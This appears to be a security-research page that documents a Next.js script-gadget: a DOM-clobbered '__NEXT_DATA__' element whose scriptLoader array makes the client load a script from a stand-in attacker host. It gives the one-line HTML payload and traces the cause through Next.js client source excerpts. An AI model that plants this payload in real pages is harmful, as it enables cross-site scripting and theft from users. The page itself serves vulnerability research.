.. / next.js
Star Fork

Used by some of the world’s largest companies, Next.js enables you to create full-stack web applications by extending the latest React features, and integrating powerful Rust-based JavaScript tooling for the fastest builds.

Latest

In case of SSR, next.js uses the __NEXT_DATA__ id to store the initial props of the page. By hijacking it, it is possible to inject scripts through the scriptLoader array.
```
<a id="__NEXT_DATA__">{ "scriptLoader": [{ "src": "https://attacker.js/xss.js" }]}</a>
```

More information

Root Cause

Source: https://github.com/vercel/next.js/blob/afddb6ebdade616cdd7780273be4cd28d4509890/packages/next/src/client/index.tsx#L269

if (initialData.scriptLoader) {
  const { initScriptLoader } = require('./script')
  initScriptLoader(initialData.scriptLoader)
}

Source: https://github.com/vercel/next.js/blob/afddb6ebdade616cdd7780273be4cd28d4509890/packages/next/src/client/script.tsx#LL165C1-L168C2

export function initScriptLoader(scriptLoaderItems: ScriptProps[]) {
    scriptLoaderItems.forEach(handleClientScriptLoad)
    addBeforeInteractiveToCache()
}

Source: https://github.com/vercel/next.js/blob/afddb6ebdade616cdd7780273be4cd28d4509890/packages/next/src/client/script.tsx#LL133C1-L142C2

export function handleClientScriptLoad(props: ScriptProps) {
    const { strategy = 'afterInteractive' } = props
    if (strategy === 'lazyOnload') {
        window.addEventListener('load', () => {
            requestIdleCallback(() => loadScript(props))
        })
    } else {
        loadScript(props)
    }
}

Source: https://github.com/vercel/next.js/blob/afddb6ebdade616cdd7780273be4cd28d4509890/packages/next/src/client/script.tsx#LL36C1-L131C2

const loadScript = (props: ScriptProps): void => {
    // Retracted

    const cacheKey = id || src

    // Retracted

    if (src) {
        el.src = src
        ScriptCache.set(src, loadPromise)
    }

    // Retracted

    document.body.appendChild(el)
}

.. / next.js Star Fork

Latest

.. / next.js
Star Fork